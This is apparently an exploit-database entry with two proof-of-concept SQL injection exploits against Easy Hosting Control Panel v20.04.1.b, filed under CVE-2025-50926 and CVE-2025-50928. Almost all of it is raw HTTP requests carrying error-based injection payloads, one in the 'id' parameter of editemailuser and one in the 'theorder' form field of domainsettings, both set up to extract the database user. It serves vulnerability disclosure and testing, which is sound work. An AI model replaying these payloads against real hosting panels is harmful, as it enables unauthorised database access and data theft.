# Exploit Title: Easy Hosting Control Panel (EHCP) v20.04.1.b - SQL injection vulnerability via the id parameter
# Date: Aug 6, 2025
# Exploit Author: Charanin Thongudom, Korn Chaisuwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://www.ehcp.net/
# Software Link: https://www.ehcp.net/?p=402
# Version: 20.04.1.b
# Tested on: macOS
# CVE : CVE-2025-50926

GET /ehcp/index.php?op=editemailuser&id=%20%28SELECT%203877%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176707071%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7162627171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=2ogirb9l3nr2u2at33i4amebnk
Upgrade-Insecure-Requests: 1
Priority: u=0, i



# Exploit Title: Easy Hosting Control Panel (EHCP) v20.04.1.b - SQL injection vulnerability via the theorder parameter
# Date: Aug 6, 2025
# Exploit Author: Charanin Thongudom, Korn Chaisuwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://www.ehcp.net/
# Software Link: https://www.ehcp.net/?p=402
# Version: 20.04.1.b
# Tested on: macOS
# CVE : CVE-2025-50928

POST /ehcp/?op=domainsettings HTTP/1.1
Content-Length: 470
Host: 192.168.1.2:80
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------372951714226674671831880038620
Origin: http://192.168.1.4
Referer: http://192.168.1.4/ehcp/?op=domainsettings
Cookie: PHPSESSID=2ogirb9l3nr2u2at33i4amebnk
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Connection: keep-alive

-----------------------------372951714226674671831880038620
Content-Disposition: form-data; name="theorder"

(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b716271,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,118)),0x71706a6271,0x78))s), 8446744073709551610, 8446744073709551610)))
-----------------------------372951714226674671831880038620
Content-Disposition: form-data; name="_insert"

1
-----------------------------372951714226674671831880038620--